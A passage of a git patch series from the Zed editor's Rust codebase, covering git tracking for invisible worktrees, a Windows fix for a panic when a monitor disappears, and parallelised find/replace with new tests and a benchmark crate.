Ok(cx.new(move |cx: &mut Context| { let mut snapshot = LocalSnapshot { @@ -1147,6 +1151,7 @@ impl LocalWorktree { let next_entry_id = self.next_entry_id.clone(); let fs = self.fs.clone(); let scanning_enabled = self.scanning_enabled; + let track_git_repositories = self.visible; let settings = self.settings.clone(); let (scan_states_tx, mut scan_states_rx) = mpsc::unbounded(); let background_scanner = cx.background_spawn({ @@ -1185,6 +1190,7 @@ impl 
LocalWorktree { share_private_files, settings, watcher, + track_git_repositories, is_single_file, }; @@ -3936,6 +3942,7 @@ struct BackgroundScanner { watcher: Arc, settings: WorktreeSettings, share_private_files: bool, + track_git_repositories: bool, /// Whether this is a single-file worktree (root is a file, not a directory). /// Used to determine if we should give up after repeated canonicalization failures. is_single_file: bool, @@ -3961,7 +3968,7 @@ impl BackgroundScanner { // If the worktree root does not contain a git repository, then find // the git repository in an ancestor directory. Find any gitignore files // in ancestor directories. - let repo = if scanning_enabled { + let repo = if scanning_enabled && self.track_git_repositories { let (ignores, exclude, repo) = discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await; let mut state = self.state.lock().await; @@ -3989,6 +3996,7 @@ impl BackgroundScanner { let containing_git_repository = if let Some((ancestor_dot_git, work_directory)) = repo && scanning_enabled + && self.track_git_repositories { maybe!(async { self.state @@ -4015,6 +4023,7 @@ impl BackgroundScanner { let mut global_gitignore_events = if let Some(global_gitignore_path) = &global_gitignore_file && scanning_enabled + && self.track_git_repositories { let is_file = self.fs.is_file(&global_gitignore_path).await; self.state.lock().await.snapshot.global_gitignore = if is_file { @@ -4352,14 +4361,16 @@ impl BackgroundScanner { let mut dot_git_paths = None; - for ancestor in abs_path.as_path().ancestors() { - if is_dot_git(ancestor, self.fs.as_ref()).await { - let path_in_git_dir = abs_path - .as_path() - .strip_prefix(ancestor) - .expect("stripping off the ancestor"); - dot_git_paths = Some((ancestor.to_owned(), path_in_git_dir.to_owned())); - break; + if self.track_git_repositories { + for ancestor in abs_path.as_path().ancestors() { + if is_dot_git(ancestor, self.fs.as_ref()).await { + let path_in_git_dir = abs_path + .as_path() + 
.strip_prefix(ancestor) + .expect("stripping off the ancestor"); + dot_git_paths = Some((ancestor.to_owned(), path_in_git_dir.to_owned())); + break; + } } } @@ -4384,9 +4395,10 @@ impl BackgroundScanner { } } - if abs_path - .as_path() - .ends_with(Path::new(DOT_GIT).join(REPO_EXCLUDE)) + if self.track_git_repositories + && abs_path + .as_path() + .ends_with(Path::new(DOT_GIT).join(REPO_EXCLUDE)) { if let Some(repository) = snapshot.git_repositories.values().find(|repo| { repo.common_dir_abs_path.join(REPO_EXCLUDE) == abs_path.as_path() @@ -4437,7 +4449,9 @@ impl BackgroundScanner { continue; }; - if abs_path.file_name() == Some(OsStr::new(GITIGNORE)) { + if self.track_git_repositories + && abs_path.file_name() == Some(OsStr::new(GITIGNORE)) + { for (_, repo) in snapshot .git_repositories .iter() @@ -4774,29 +4788,33 @@ impl BackgroundScanner { continue; }; - if child_name == DOT_GIT { - let mut state = self.state.lock().await; - state - .insert_git_repository( - child_path.clone(), - self.fs.as_ref(), - self.watcher.as_ref(), - ) - .await; - } else if child_name == GITIGNORE { - match build_gitignore(&child_abs_path, self.fs.as_ref()).await { - Ok(ignore) => { - let ignore = Arc::new(ignore); - ignore_stack = ignore_stack - .append(IgnoreKind::Gitignore(job.abs_path.clone()), ignore.clone()); - new_ignore = Some(ignore); - } - Err(error) => { - log::error!( - "error loading .gitignore file {:?} - {:?}", - child_name, - error - ); + if self.track_git_repositories { + if child_name == DOT_GIT { + let mut state = self.state.lock().await; + state + .insert_git_repository( + child_path.clone(), + self.fs.as_ref(), + self.watcher.as_ref(), + ) + .await; + } else if child_name == GITIGNORE { + match build_gitignore(&child_abs_path, self.fs.as_ref()).await { + Ok(ignore) => { + let ignore = Arc::new(ignore); + ignore_stack = ignore_stack.append( + IgnoreKind::Gitignore(job.abs_path.clone()), + ignore.clone(), + ); + new_ignore = Some(ignore); + } + Err(error) => { + 
log::error!( + "error loading .gitignore file {:?} - {:?}", + child_name, + error + ); + } } } } @@ -5004,11 +5022,12 @@ impl BackgroundScanner { ) .await; - let mut new_ancestor_repo = if relative_paths.iter().any(|path| path.is_empty()) { - Some(discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await) - } else { - None - }; + let mut new_ancestor_repo = + if self.track_git_repositories && relative_paths.iter().any(|path| path.is_empty()) { + Some(discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await) + } else { + None + }; let mut state = self.state.lock().await; let doing_recursive_update = scan_queue_tx.is_some(); @@ -5054,7 +5073,8 @@ impl BackgroundScanner { if let (Some(scan_queue_tx), true) = (&scan_queue_tx, is_dir) { if state.should_scan_directory(&fs_entry) - || (fs_entry.path.is_empty() + || (self.track_git_repositories + && fs_entry.path.is_empty() && abs_path.file_name() == Some(OsStr::new(DOT_GIT))) { state diff --git a/crates/worktree/tests/integration/main.rs b/crates/worktree/tests/integration/main.rs index 87eb0fe3081bd2..4fa1fa9a1e4ca7 100644 --- a/crates/worktree/tests/integration/main.rs +++ b/crates/worktree/tests/integration/main.rs @@ -3283,6 +3283,50 @@ async fn test_root_repo_common_dir(executor: BackgroundExecutor, cx: &mut TestAp ); } +#[gpui::test] +async fn test_invisible_worktree_does_not_track_ancestor_git_repository( + executor: BackgroundExecutor, + cx: &mut TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(executor); + fs.insert_tree( + path!("/repo"), + json!({ + ".git": {}, + "project": { + "file.txt": "content", + }, + }), + ) + .await; + + let worktree = Worktree::local( + path!("/repo/project").as_ref(), + false, + fs.clone(), + Arc::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + worktree + .update(cx, |worktree, _| { + worktree.as_local().unwrap().scan_complete() + }) + .await; + cx.run_until_parked(); + + worktree.read_with(cx, |worktree, 
_| { + let local_worktree = worktree.as_local().unwrap(); + assert!(local_worktree.repositories().is_empty()); + assert_eq!(local_worktree.root_repo_common_dir(), None); + }); +} + #[gpui::test] async fn test_linked_worktree_git_file_event_does_not_panic( executor: BackgroundExecutor, From f6572454c18b080fc91d049a512c3fd78edaf281 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Wed, 6 May 2026 09:35:40 +0200 Subject: [PATCH 220/231] gpui(windows): Fix unwrap panic when monitor goes missing (#55630) Fixes ZED-5K1 Release Notes: - Fixed a panic on windows when a monitor disappears from windows monitor enumeration --------- Co-authored-by: John Tur --- crates/gpui/src/platform.rs | 10 +- crates/gpui_linux/src/linux/wayland/client.rs | 6 +- .../gpui_linux/src/linux/wayland/display.rs | 2 +- crates/gpui_linux/src/linux/x11/client.rs | 2 +- crates/gpui_linux/src/linux/x11/display.rs | 2 +- crates/gpui_linux/src/linux/x11/window.rs | 4 +- crates/gpui_macos/src/display.rs | 2 +- crates/gpui_windows/src/display.rs | 106 +++--------------- crates/gpui_windows/src/events.rs | 8 +- crates/gpui_windows/src/window.rs | 9 +- 10 files changed, 36 insertions(+), 115 deletions(-) diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index a00d158bc51704..00cd9d13a4700b 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -326,22 +326,22 @@ pub struct ScreenCaptureFrame(pub PlatformScreenCaptureFrame); /// An opaque identifier for a hardware display #[derive(PartialEq, Eq, Hash, Copy, Clone)] -pub struct DisplayId(pub(crate) u32); +pub struct DisplayId(pub(crate) u64); impl DisplayId { /// Create a new `DisplayId` from a raw platform display identifier. 
- pub fn new(id: u32) -> Self { + pub fn new(id: u64) -> Self { Self(id) } } -impl From for DisplayId { - fn from(id: u32) -> Self { +impl From for DisplayId { + fn from(id: u64) -> Self { Self(id) } } -impl From for u32 { +impl From for u64 { fn from(id: DisplayId) -> Self { id.0 } diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index 5edd9477b33878..00b0508e19c83a 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -768,7 +768,7 @@ impl LinuxClient for WaylandClient { .outputs .iter() .find_map(|(object_id, output)| { - (object_id.protocol_id() == u32::from(id)).then(|| { + (object_id.protocol_id() as u64 == u64::from(id)).then(|| { Rc::new(WaylandDisplay { id: object_id.clone(), name: output.name.clone(), @@ -810,11 +810,11 @@ impl LinuxClient for WaylandClient { let parent = state.keyboard_focused_window.clone(); let target_output = params.display_id.and_then(|display_id| { - let target_protocol_id: u32 = display_id.into(); + let target_protocol_id: u64 = display_id.into(); state .wl_outputs .iter() - .find(|(id, _)| id.protocol_id() == target_protocol_id) + .find(|(id, _)| id.protocol_id() as u64 == target_protocol_id) .map(|(_, output)| output.clone()) }); diff --git a/crates/gpui_linux/src/linux/wayland/display.rs b/crates/gpui_linux/src/linux/wayland/display.rs index 874cae878381cf..8fa9122d6296b3 100644 --- a/crates/gpui_linux/src/linux/wayland/display.rs +++ b/crates/gpui_linux/src/linux/wayland/display.rs @@ -25,7 +25,7 @@ impl Hash for WaylandDisplay { impl PlatformDisplay for WaylandDisplay { fn id(&self) -> DisplayId { - DisplayId::new(self.id.protocol_id()) + DisplayId::new(self.id.protocol_id() as u64) } fn uuid(&self) -> anyhow::Result { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index bedd3c3e2973e0..1e573a54bf5e36 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ 
b/crates/gpui_linux/src/linux/x11/client.rs @@ -1567,7 +1567,7 @@ impl LinuxClient for X11Client { X11Display::new( &state.xcb_connection, state.scale_factor, - u32::from(id) as usize, + u64::from(id) as usize, ) .ok()?, )) diff --git a/crates/gpui_linux/src/linux/x11/display.rs b/crates/gpui_linux/src/linux/x11/display.rs index 900c55e759ac86..582d76f7f60272 100644 --- a/crates/gpui_linux/src/linux/x11/display.rs +++ b/crates/gpui_linux/src/linux/x11/display.rs @@ -38,7 +38,7 @@ impl X11Display { impl PlatformDisplay for X11Display { fn id(&self) -> DisplayId { - DisplayId::new(self.x_screen_index as u32) + DisplayId::new(self.x_screen_index as u64) } fn uuid(&self) -> anyhow::Result { diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index 325d70eb311743..0e402a7d63b26f 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -343,7 +343,7 @@ impl rwh::HasDisplayHandle for X11Window { }; let screen_id = { let state = self.0.state.borrow(); - u32::from(state.display.id()) as i32 + u64::from(state.display.id()) as i32 }; let handle = rwh::XcbDisplayHandle::new(Some(non_zero), screen_id); Ok(unsafe { rwh::DisplayHandle::borrow_raw(handle.into()) }) @@ -429,7 +429,7 @@ impl X11WindowState { ) -> anyhow::Result { let x_screen_index = params .display_id - .map_or(x_main_screen_index, |did| u32::from(did) as usize); + .map_or(x_main_screen_index, |did| u64::from(did) as usize); let visual_set = find_visuals(xcb, x_screen_index); diff --git a/crates/gpui_macos/src/display.rs b/crates/gpui_macos/src/display.rs index b9338bff84621e..8e5db589359966 100644 --- a/crates/gpui_macos/src/display.rs +++ b/crates/gpui_macos/src/display.rs @@ -73,7 +73,7 @@ unsafe extern "C" { impl PlatformDisplay for MacDisplay { fn id(&self) -> DisplayId { - DisplayId::new(self.0) + DisplayId::new(self.0 as u64) } fn uuid(&self) -> Result { diff --git a/crates/gpui_windows/src/display.rs 
b/crates/gpui_windows/src/display.rs index 1931a6949fdf64..3b81dc63a004a2 100644 --- a/crates/gpui_windows/src/display.rs +++ b/crates/gpui_windows/src/display.rs @@ -35,21 +35,19 @@ unsafe impl Sync for WindowsDisplay {} impl WindowsDisplay { pub(crate) fn new(display_id: DisplayId) -> Option { - let screen = available_monitors() - .into_iter() - .nth(u32::from(display_id) as _)?; - let info = get_monitor_info(screen).log_err()?; + let handle = HMONITOR(u64::from(display_id) as _); + let info = get_monitor_info(handle).log_err()?; let monitor_size = info.monitorInfo.rcMonitor; let work_area = info.monitorInfo.rcWork; let uuid = generate_uuid(&info.szDevice); - let scale_factor = get_scale_factor_for_monitor(screen).log_err()?; + let scale_factor = get_scale_factor_for_monitor(handle).log_err()?; let physical_size = size( (monitor_size.right - monitor_size.left).into(), (monitor_size.bottom - monitor_size.top).into(), ); Some(WindowsDisplay { - handle: screen, + handle, display_id, scale_factor, bounds: Bounds { @@ -76,86 +74,8 @@ impl WindowsDisplay { }) } - pub fn new_with_handle(monitor: HMONITOR) -> anyhow::Result { - let info = get_monitor_info(monitor)?; - let monitor_size = info.monitorInfo.rcMonitor; - let work_area = info.monitorInfo.rcWork; - let uuid = generate_uuid(&info.szDevice); - let display_id = available_monitors() - .iter() - .position(|handle| handle.0 == monitor.0) - .unwrap(); - let scale_factor = get_scale_factor_for_monitor(monitor)?; - let physical_size = size( - (monitor_size.right - monitor_size.left).into(), - (monitor_size.bottom - monitor_size.top).into(), - ); - - Ok(WindowsDisplay { - handle: monitor, - display_id: DisplayId::new(display_id as _), - scale_factor, - bounds: Bounds { - origin: logical_point( - monitor_size.left as f32, - monitor_size.top as f32, - scale_factor, - ), - size: physical_size.to_pixels(scale_factor), - }, - visible_bounds: Bounds { - origin: logical_point(work_area.left as f32, work_area.top as f32, 
scale_factor), - size: size( - (work_area.right - work_area.left) as f32 / scale_factor, - (work_area.bottom - work_area.top) as f32 / scale_factor, - ) - .map(gpui::px), - }, - physical_bounds: Bounds { - origin: point(monitor_size.left.into(), monitor_size.top.into()), - size: physical_size, - }, - uuid, - }) - } - - fn new_with_handle_and_id(handle: HMONITOR, display_id: DisplayId) -> anyhow::Result { - let info = get_monitor_info(handle)?; - let monitor_size = info.monitorInfo.rcMonitor; - let work_area = info.monitorInfo.rcWork; - let uuid = generate_uuid(&info.szDevice); - let scale_factor = get_scale_factor_for_monitor(handle)?; - let physical_size = size( - (monitor_size.right - monitor_size.left).into(), - (monitor_size.bottom - monitor_size.top).into(), - ); - - Ok(WindowsDisplay { - handle, - display_id, - scale_factor, - bounds: Bounds { - origin: logical_point( - monitor_size.left as f32, - monitor_size.top as f32, - scale_factor, - ), - size: physical_size.to_pixels(scale_factor), - }, - visible_bounds: Bounds { - origin: logical_point(work_area.left as f32, work_area.top as f32, scale_factor), - size: size( - (work_area.right - work_area.left) as f32 / scale_factor, - (work_area.bottom - work_area.top) as f32 / scale_factor, - ) - .map(gpui::px), - }, - physical_bounds: Bounds { - origin: point(monitor_size.left.into(), monitor_size.top.into()), - size: physical_size, - }, - uuid, - }) + pub(crate) fn display_id_for_monitor(monitor: HMONITOR) -> DisplayId { + DisplayId::new(monitor.0 as u64) } pub fn primary_monitor() -> Option { @@ -169,7 +89,7 @@ impl WindowsDisplay { ); return None; } - WindowsDisplay::new_with_handle(monitor).log_err() + WindowsDisplay::new(Self::display_id_for_monitor(monitor)) } /// Check if the center point of given bounds is inside this monitor @@ -183,7 +103,7 @@ impl WindowsDisplay { if monitor.is_invalid() { false } else { - let Ok(display) = WindowsDisplay::new_with_handle(monitor) else { + let Some(display) = 
WindowsDisplay::new(Self::display_id_for_monitor(monitor)) else { return false; }; display.uuid == self.uuid @@ -193,11 +113,11 @@ impl WindowsDisplay { pub fn displays() -> Vec> { available_monitors() .into_iter() - .enumerate() - .filter_map(|(id, handle)| { - Some(Rc::new( - WindowsDisplay::new_with_handle_and_id(handle, DisplayId::new(id as _)).ok()?, - ) as Rc) + .filter_map(|handle| { + Some( + Rc::new(WindowsDisplay::new(Self::display_id_for_monitor(handle))?) + as Rc, + ) }) .collect() } diff --git a/crates/gpui_windows/src/events.rs b/crates/gpui_windows/src/events.rs index 370582e83b5a5f..a4c47789191f9c 100644 --- a/crates/gpui_windows/src/events.rs +++ b/crates/gpui_windows/src/events.rs @@ -143,9 +143,9 @@ impl WindowsWindowInner { // monitor is invalid, we do nothing. if !monitor.is_invalid() && self.state.display.get().handle != monitor { // we will get the same monitor if we only have one - self.state - .display - .set(WindowsDisplay::new_with_handle(monitor).log_err()?); + self.state.display.set(WindowsDisplay::new( + WindowsDisplay::display_id_for_monitor(monitor), + )?); } } if let Some(mut callback) = self.state.callbacks.moved.take() { @@ -853,7 +853,7 @@ impl WindowsWindowInner { log::error!("No monitor detected!"); return None; } - let new_display = WindowsDisplay::new_with_handle(new_monitor).log_err()?; + let new_display = WindowsDisplay::new(WindowsDisplay::display_id_for_monitor(new_monitor))?; self.state.display.set(new_display); Some(0) } diff --git a/crates/gpui_windows/src/window.rs b/crates/gpui_windows/src/window.rs index 2fd7c3c6461dd5..130d3dd7214b2c 100644 --- a/crates/gpui_windows/src/window.rs +++ b/crates/gpui_windows/src/window.rs @@ -465,11 +465,12 @@ impl WindowsWindow { let hinstance = get_module_handle(); let display = if let Some(display_id) = params.display_id { - // if we obtain a display_id, then this ID must be valid. 
- WindowsDisplay::new(display_id).unwrap() + WindowsDisplay::new(display_id) } else { - WindowsDisplay::primary_monitor().unwrap() - }; + None + } + .or_else(WindowsDisplay::primary_monitor) + .context("failed to find any monitor")?; let appearance = system_appearance().unwrap_or_default(); let mut context = WindowCreateContext { inner: None, From 4e5d9a7f980b6a661c0714a053e7d74502f94224 Mon Sep 17 00:00:00 2001 From: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> Date: Wed, 6 May 2026 11:28:05 +0200 Subject: [PATCH 221/231] editor: Improve find_matches and replace_all perf (#51941) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Helps with https://github.com/zed-industries/zed/issues/38927 - **editor: Add a benchmark for find/replace** - **text: batch fragment insertions before turning them into a SumTree** ## Context ## How to Review ## Self-Review Checklist - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Improved performance of "Replace All" in buffer search --------- Co-authored-by: Smit Barmase --- Cargo.lock | 18 ++ Cargo.toml | 1 + crates/editor/src/items.rs | 248 +++++++++++++++++++++--- crates/editor_benchmarks/Cargo.toml | 22 +++ crates/editor_benchmarks/LICENSE-GPL | 1 + crates/editor_benchmarks/src/main.rs | 180 +++++++++++++++++ crates/multi_buffer/src/multi_buffer.rs | 26 ++- crates/text/src/text.rs | 49 ++++- 8 files changed, 506 insertions(+), 39 deletions(-) create mode 100644 crates/editor_benchmarks/Cargo.toml create mode 120000 crates/editor_benchmarks/LICENSE-GPL create mode 100644 crates/editor_benchmarks/src/main.rs diff --git a/Cargo.lock b/Cargo.lock 
index 2a28d8922505ea..f35cb8bbfb2f23 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -5549,6 +5549,24 @@ dependencies = [ "ztracing", ] +[[package]] +name = "editor_benchmarks" +version = "0.1.0" +dependencies = [ + "anyhow", + "editor", + "gpui", + "gpui_platform", + "language", + "multi_buffer", + "project", + "release_channel", + "semver", + "settings", + "theme", + "workspace", +] + [[package]] name = "either" version = "1.15.0" diff --git a/Cargo.toml b/Cargo.toml index e613ed2e99afad..683592a35b9aba 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -61,6 +61,7 @@ members = [ "crates/edit_prediction_types", "crates/edit_prediction_ui", "crates/editor", + "crates/editor_benchmarks", "crates/encoding_selector", "crates/env_var", "crates/etw_tracing", diff --git a/crates/editor/src/items.rs b/crates/editor/src/items.rs index 125f09c96614e1..c352ec9d03f17e 100644 --- a/crates/editor/src/items.rs +++ b/crates/editor/src/items.rs @@ -11,7 +11,7 @@ use anyhow::{Context as _, Result, anyhow}; use collections::{HashMap, HashSet}; use file_icons::FileIcons; use fs::MTime; -use futures::future::try_join_all; +use futures::{channel::oneshot, future::try_join_all}; use git::status::GitSummary; use gpui::{ AnyElement, App, AsyncWindowContext, Context, Entity, EntityId, EventEmitter, Font, @@ -22,22 +22,24 @@ use language::{ SelectionGoal, proto::serialize_anchor as serialize_text_anchor, }; use lsp::DiagnosticSeverity; -use multi_buffer::{MultiBufferOffset, PathKey}; +use multi_buffer::{BufferOffset, MultiBufferOffset, PathKey}; use project::{ File, Project, ProjectItem as _, ProjectPath, lsp_store::FormatTrigger, project_settings::ProjectSettings, search::SearchQuery, }; +use rope::TextSummary; use rpc::proto::{self, update_view}; use settings::Settings; use std::{ any::{Any, TypeId}, borrow::Cow, cmp::{self, Ordering}, + num::NonZeroU32, ops::Range, path::{Path, PathBuf}, sync::Arc, }; -use text::{BufferId, BufferSnapshot, Selection}; +use text::{BufferId, BufferSnapshot, 
OffsetRangeExt, Selection}; use ui::{IconDecorationKind, prelude::*}; use util::{ResultExt, TryFutureExt, paths::PathExt, rel_path::RelPath}; use workspace::item::{Dedup, ItemSettings, SerializableItem, TabContentParams}; @@ -1871,6 +1873,7 @@ impl SearchableItem for Editor { ranges.iter().cloned().collect::>() }); + let executor = cx.background_executor().clone(); cx.background_spawn(async move { let mut ranges = Vec::new(); @@ -1879,38 +1882,70 @@ impl SearchableItem for Editor { } else { search_within_ranges }; - + let num_cpus = executor.num_cpus(); for range in search_within_ranges { for (search_buffer, search_range, deleted_hunk_anchor) in buffer.range_to_buffer_ranges_with_deleted_hunks(range) { - ranges.extend( - query - .search( - search_buffer, - Some(search_range.start.0..search_range.end.0), - ) - .await - .into_iter() - .filter_map(|match_range| { - if let Some(deleted_hunk_anchor) = deleted_hunk_anchor { - let start = search_buffer - .anchor_after(search_range.start + match_range.start); - let end = search_buffer - .anchor_before(search_range.start + match_range.end); - Some( - deleted_hunk_anchor.with_diff_base_anchor(start) - ..deleted_hunk_anchor.with_diff_base_anchor(end), - ) - } else { - let start = search_buffer - .anchor_after(search_range.start + match_range.start); - let end = search_buffer - .anchor_before(search_range.start + match_range.end); - buffer.buffer_anchor_range_to_anchor_range(start..end) - } - }), - ); + let query = query.clone(); + + let mut results = Vec::new(); + executor + .scoped(|scope| { + for search_range in chunk_search_range( + search_buffer.text.clone(), + &query, + num_cpus as u32, + search_range, + ) { + let query = query.clone(); + let buffer = buffer.clone(); + + let (tx, rx) = oneshot::channel(); + results.push(rx); + scope.spawn(async move { + let chunk_result = query + .search( + search_buffer, + Some(search_range.start..search_range.end), + ) + .await + .into_iter() + .filter_map(|match_range| { + if let 
Some(deleted_hunk_anchor) = deleted_hunk_anchor { + let start = search_buffer.anchor_after( + search_range.start + match_range.start, + ); + let end = search_buffer.anchor_before( + search_range.start + match_range.end, + ); + Some( + deleted_hunk_anchor.with_diff_base_anchor(start) + ..deleted_hunk_anchor + .with_diff_base_anchor(end), + ) + } else { + let start = search_buffer.anchor_after( + search_range.start + match_range.start, + ); + let end = search_buffer.anchor_before( + search_range.start + match_range.end, + ); + buffer.anchor_range_in_buffer(start..end) + } + }) + .collect::>(); + _ = tx.send(chunk_result); + }); + } + }) + .await; + + for rx in results { + if let Ok(results) = rx.await { + ranges.extend(results); + } + } } } @@ -2109,6 +2144,48 @@ fn deserialize_path_key(path_key: proto::PathKey) -> Option { }) } +fn chunk_search_range( + buffer: BufferSnapshot, + query: &SearchQuery, + num_cpus: u32, + initial_range: Range, +) -> Box> + 'static> { + let range = initial_range.to_offset(&buffer); + if range.is_empty() { + return Box::new(std::iter::empty()); + } + + let summary: TextSummary = buffer.text_summary_for_range(initial_range); + let num_chunks = if !query.is_regex() && !query.as_str().contains('\n') { + NonZeroU32::new(summary.lines.row.saturating_add(1).min(num_cpus.max(1))) + } else { + NonZeroU32::new(1) + }; + + let Some(num_chunks) = num_chunks else { + return Box::new(std::iter::empty()); + }; + + let mut chunk_start = range.start; + let rope = buffer.as_rope().clone(); + let range_end = range.end; + let average_chunk_length = summary.len.div_ceil(num_chunks.get() as usize); + Box::new(std::iter::from_fn(move || { + if chunk_start >= range_end { + return None; + } + let candidate_position = chunk_start + average_chunk_length; + let adjusted = rope.ceil_char_boundary(candidate_position); + let mut as_point = rope.offset_to_point(adjusted); + as_point.row += 1; + as_point.column = 0; + let end_offset = 
buffer.point_to_offset(as_point).min(range_end); + let ret = chunk_start..end_offset; + chunk_start = end_offset; + Some(ret) + })) +} + #[cfg(test)] mod tests { use crate::editor_tests::init_test; @@ -2134,6 +2211,115 @@ mod tests { assert_eq!(path_for_file(&file, 0, false, cx), None); } + #[gpui::test] + fn test_chunk_search_range_multi_line(cx: &mut App) { + let text = "line one\nline two\nline three\nline four\nline five\nline six\n"; + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let snapshot = buffer.read(cx).snapshot(); + + let chunks = chunk_search_range_for_test(&snapshot, "line", 4, 0..text.len()); + + assert_chunks_are_contiguous(&chunks, 0..text.len()); + assert!( + chunks.len() <= 4, + "got {} chunks, expected <= num_cpus (4)", + chunks.len() + ); + for chunk in &chunks { + let end = chunk.end; + assert!( + end == text.len() || text.as_bytes()[end - 1] == b'\n', + "chunk ending at {end} is not a line boundary", + ); + } + } + + #[gpui::test] + fn test_chunk_search_range_single_line(cx: &mut App) { + let text = "hello world hello again"; + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let snapshot = buffer.read(cx).snapshot(); + + let chunks = chunk_search_range_for_test(&snapshot, "hello", 4, 0..text.len()); + assert_chunks_are_contiguous(&chunks, 0..text.len()); + } + + #[gpui::test] + fn test_chunk_search_range_empty_range(cx: &mut App) { + let buffer = cx.new(|cx| Buffer::local("hello world", cx)); + let snapshot = buffer.read(cx).snapshot(); + + let chunks = chunk_search_range_for_test(&snapshot, "hello", 4, 5..5); + assert!(chunks.is_empty()); + } + + #[gpui::test] + fn test_chunk_search_range_does_not_start_at_zero(cx: &mut App) { + let line = "abcdefghij\n"; + let text = line.repeat(20); + let buffer = cx.new(|cx| Buffer::local(text.clone(), cx)); + let snapshot = buffer.read(cx).snapshot(); + + let start = line.len() * 7; + let end = line.len() * 14; + let chunks = chunk_search_range_for_test(&snapshot, "abc", 4, start..end); + + 
assert_chunks_are_contiguous(&chunks, start..end); + } + + fn chunk_search_range_for_test( + snapshot: &language::BufferSnapshot, + query: &str, + num_cpus: u32, + range: Range, + ) -> Vec> { + let query = SearchQuery::text( + query, + false, + false, + false, + Default::default(), + Default::default(), + false, + None, + ) + .unwrap(); + chunk_search_range( + snapshot.text.clone(), + &query, + num_cpus, + BufferOffset(range.start)..BufferOffset(range.end), + ) + .collect() + } + + #[track_caller] + fn assert_chunks_are_contiguous(chunks: &[Range], expected: Range) { + assert!(!chunks.is_empty(), "expected at least one chunk"); + assert_eq!( + chunks.first().unwrap().start, + expected.start, + "first chunk does not start at {}", + expected.start + ); + assert_eq!( + chunks.last().unwrap().end, + expected.end, + "last chunk does not end at {}", + expected.end + ); + for chunk in chunks { + assert!(chunk.start < chunk.end, "empty chunk: {:?}", chunk); + } + for window in chunks.windows(2) { + assert_eq!( + window[0].end, window[1].start, + "gap or overlap between chunks {:?} and {:?}", + window[0], window[1], + ); + } + } + async fn deserialize_editor( item_id: ItemId, workspace_id: WorkspaceId, diff --git a/crates/editor_benchmarks/Cargo.toml b/crates/editor_benchmarks/Cargo.toml new file mode 100644 index 00000000000000..8db5d4b26aefd8 --- /dev/null +++ b/crates/editor_benchmarks/Cargo.toml @@ -0,0 +1,22 @@ +[package] +name = "editor_benchmarks" +version = "0.1.0" +publish.workspace = true +edition.workspace = true + +[dependencies] +anyhow.workspace = true +editor.workspace = true +gpui.workspace = true +gpui_platform.workspace = true +language.workspace = true +multi_buffer.workspace = true +project.workspace = true +release_channel.workspace = true +semver.workspace = true +settings.workspace = true +theme.workspace = true +workspace.workspace = true + +[lints] +workspace = true diff --git a/crates/editor_benchmarks/LICENSE-GPL 
b/crates/editor_benchmarks/LICENSE-GPL new file mode 120000 index 00000000000000..89e542f750cd38 --- /dev/null +++ b/crates/editor_benchmarks/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/editor_benchmarks/src/main.rs b/crates/editor_benchmarks/src/main.rs new file mode 100644 index 00000000000000..81df55334014da --- /dev/null +++ b/crates/editor_benchmarks/src/main.rs @@ -0,0 +1,180 @@ +use std::sync::Arc; + +use editor::Editor; +use gpui::{AppContext as _, AsyncWindowContext, WeakEntity, WindowBounds, WindowOptions}; +use language::Buffer; +use multi_buffer::Anchor; +use project::search::SearchQuery; +use workspace::searchable::SearchableItem; + +#[derive(Debug)] +struct Args { + file: String, + query: String, + replace: Option, + regex: bool, + whole_word: bool, + case_sensitive: bool, +} + +fn parse_args() -> Args { + let mut args_iter = std::env::args().skip(1); + let mut parsed = Args { + file: String::new(), + query: String::new(), + replace: None, + regex: false, + whole_word: false, + case_sensitive: false, + }; + + let mut positional = Vec::new(); + while let Some(arg) = args_iter.next() { + match arg.as_str() { + "--regex" => parsed.regex = true, + "--whole-word" => parsed.whole_word = true, + "--case-sensitive" => parsed.case_sensitive = true, + "-r" | "--replace" => { + parsed.replace = args_iter.next(); + } + "--help" | "-h" => { + eprintln!( + "Usage: editor_benchmarks [OPTIONS] \n\n\ + Arguments:\n \ + Path to the file to search in\n \ + The search query string\n\n\ + Options:\n \ + -r, --replace Replacement text (runs replace_all)\n \ + --regex Treat query as regex\n \ + --whole-word Match whole words only\n \ + --case-sensitive Case-sensitive matching\n \ + -h, --help Print help" + ); + std::process::exit(0); + } + other => positional.push(other.to_string()), + } + } + + if positional.len() < 2 { + eprintln!("Usage: editor_benchmarks [OPTIONS] "); + std::process::exit(1); + } + parsed.file = 
